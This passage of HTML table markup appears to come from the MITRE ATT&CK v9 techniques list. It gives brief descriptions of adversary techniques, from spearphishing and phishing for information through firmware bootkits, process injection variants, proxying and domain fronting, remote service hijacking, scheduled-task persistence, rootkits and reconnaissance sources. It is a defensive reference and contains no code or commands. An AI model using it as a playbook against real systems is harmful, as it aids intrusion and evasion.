Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon <a href="/versions/v9/techniques/T1204">User Execution</a> to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1566/002"> Spearphishing Link </a> </td> <td> Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1566/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1566/003"> Spearphishing via Service </a> </td> <td> Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1598"> T1598 </a> </td> <td> <a href="/versions/v9/techniques/T1598"> Phishing for Information </a> </td> <td> Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from <a href="/versions/v9/techniques/T1566">Phishing</a> in that the objective is gathering data from the victim rather than executing malicious code. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1598/001"> Spearphishing Service </a> </td> <td> Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1598/002"> Spearphishing Attachment </a> </td> <td> Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. 
Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1598/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1598/003"> Spearphishing Link </a> </td> <td> Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: <a href="/versions/v9/techniques/T1585">Establish Accounts</a> or <a href="/versions/v9/techniques/T1586">Compromise Accounts</a>) and/or sending multiple, seemingly urgent messages. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1542"> T1542 </a> </td> <td> <a href="/versions/v9/techniques/T1542"> Pre-OS Boot </a> </td> <td> Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1542/001"> System Firmware </a> </td> <td> Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1542/002"> Component Firmware </a> </td> <td> Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to <a href="/versions/v9/techniques/T1542/001">System Firmware</a> but conducted upon other system components/devices that may not have the same capability or level of integrity checking. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1542/003"> Bootkit </a> </td> <td> Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1542/004"> ROMMONkit </a> </td> <td> Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1542/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1542/005"> TFTP Boot </a> </td> <td> Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1057"> T1057 </a> </td> <td> <a href="/versions/v9/techniques/T1057"> Process Discovery </a> </td> <td> Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from <a href="/versions/v9/techniques/T1057">Process Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1055"> T1055 </a> </td> <td> <a href="/versions/v9/techniques/T1055"> Process Injection </a> </td> <td> Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. 
Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1055/001"> Dynamic-link Library Injection </a> </td> <td> Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1055/002"> Portable Executable Injection </a> </td> <td> Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1055/003"> Thread Execution Hijacking </a> </td> <td> Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1055/004"> Asynchronous Procedure Call </a> </td> <td> Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1055/005"> Thread Local Storage </a> </td> <td> Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1055/008"> Ptrace System Calls </a> </td> <td> Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1055/009"> Proc Memory </a> </td> <td> Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1055/011"> Extra Window Memory Injection </a> </td> <td> Adversaries may inject malicious code into processes via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1055/012"> Process Hollowing </a> </td> <td> Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1055/013"> Process Doppelgänging </a> </td> <td> Adversaries may inject malicious code into processes via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1055/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1055/014"> VDSO Hijacking </a> </td> <td> Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1572"> T1572 </a> </td> <td> <a href="/versions/v9/techniques/T1572"> Protocol Tunneling </a> </td> <td> Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1090"> T1090 </a> </td> <td> <a href="/versions/v9/techniques/T1090"> Proxy </a> </td> <td> Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1090/001"> Internal Proxy </a> </td> <td> Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1090/002"> External Proxy </a> </td> <td> Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including <a href="/versions/v9/software/S0040">HTRAN</a>, ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion. 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1090/003"> Multi-hop Proxy </a> </td> <td> To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1090/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1090/004"> Domain Fronting </a> </td> <td> Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the technique, "domainless" fronting, utilizes an SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1012"> T1012 </a> </td> <td> <a href="/versions/v9/techniques/T1012"> Query Registry </a> </td> <td> Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1219"> T1219 </a> </td> <td> <a href="/versions/v9/techniques/T1219"> Remote Access Software </a> </td> <td> An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1563"> T1563 </a> </td> <td> <a href="/versions/v9/techniques/T1563"> Remote Service Session Hijacking </a> </td> <td> Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1563/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1563/001"> SSH Hijacking </a> </td> <td> Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. 
It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1563/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1563/002"> RDP Hijacking </a> </td> <td> Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1021"> T1021 </a> </td> <td> <a href="/versions/v9/techniques/T1021"> Remote Services </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1021/001"> Remote Desktop Protocol </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1021/002"> SMB/Windows Admin Shares </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1021/003"> Distributed Component Object Model </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1021/004"> SSH </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1021/005"> VNC </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1021/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1021/006"> Windows Remote Management </a> </td> <td> Adversaries may use <a href="/versions/v9/techniques/T1078">Valid Accounts</a> to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1018"> T1018 </a> </td> <td> <a href="/versions/v9/techniques/T1018"> Remote System Discovery </a> </td> <td> Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as <a href="/versions/v9/software/S0097">Ping</a> or <code>net view</code> using <a href="/versions/v9/software/S0039">Net</a>. Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1091"> T1091 </a> </td> <td> <a href="/versions/v9/techniques/T1091"> Replication Through Removable Media </a> </td> <td> Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1496"> T1496 </a> </td> <td> <a href="/versions/v9/techniques/T1496"> Resource Hijacking </a> </td> <td> Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1207"> T1207 </a> </td> <td> <a href="/versions/v9/techniques/T1207"> Rogue Domain Controller </a> </td> <td> Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1014"> T1014 </a> </td> <td> <a href="/versions/v9/techniques/T1014"> Rootkit </a> </td> <td> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1053"> T1053 </a> </td> <td> <a href="/versions/v9/techniques/T1053"> Scheduled Task/Job </a> </td> <td> Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. 
A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1053/001"> At (Linux) </a> </td> <td> Adversaries may abuse the <a href="/versions/v9/software/S0110">at</a> utility to perform task scheduling for initial or recurring execution of malicious code. The <a href="/versions/v9/software/S0110">at</a> command within Linux operating systems enables administrators to schedule tasks. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1053/002"> At (Windows) </a> </td> <td> Adversaries may abuse the <code>at.exe</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <a href="/versions/v9/software/S0110">at</a> utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using <a href="/versions/v9/software/S0110">at</a> requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1053/003"> Cron </a> </td> <td> Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code>crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. 
Any <code>crontab</code> files are stored in operating system-specific file paths. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1053/004"> Launchd </a> </td> <td> Adversaries may abuse the <code>Launchd</code> daemon to perform task scheduling for initial or recurring execution of malicious code. The <code>launchd</code> daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code>. These LaunchDaemons have property list files which point to the executables that will be launched. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1053/005"> Scheduled Task </a> </td> <td> Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1053/006"> Systemd Timers </a> </td> <td> Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. 
Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to <a href="/versions/v9/techniques/T1053/003">Cron</a> in Linux environments. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1053/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1053/007"> Container Orchestration Job </a> </td> <td> Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1029"> T1029 </a> </td> <td> <a href="/versions/v9/techniques/T1029"> Scheduled Transfer </a> </td> <td> Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1113"> T1113 </a> </td> <td> <a href="/versions/v9/techniques/T1113"> Screen Capture </a> </td> <td> Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1597"> T1597 </a> </td> <td> <a href="/versions/v9/techniques/T1597"> Search Closed Sources </a> </td> <td> Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1597/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1597/001"> Threat Intel Vendors </a> </td> <td> Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1597/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1597/002"> Purchase Technical Data </a> </td> <td> Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. 
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1596"> T1596 </a> </td> <td> <a href="/versions/v9/techniques/T1596"> Search Open Technical Databases </a> </td> <td> Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1596/001"> DNS/Passive DNS </a> </td> <td> Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1596/002"> WHOIS </a> </td> <td> Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is maintained by the regional Internet registries (RIRs) and the domain name registries responsible for allocating and assigning Internet resources such as IP address blocks and domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1596/003"> Digital Certificates </a> </td> <td> Adversaries may search public digital certificate data for information about victims that can be used during targeting. 
Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1596/004"> CDNs </a> </td> <td> Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1596/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1596/005"> Scan Databases </a> </td> <td> Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1593"> T1593 </a> </td> <td> <a href="/versions/v9/techniques/T1593"> Search Open Websites/Domains </a> </td> <td> Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts. 
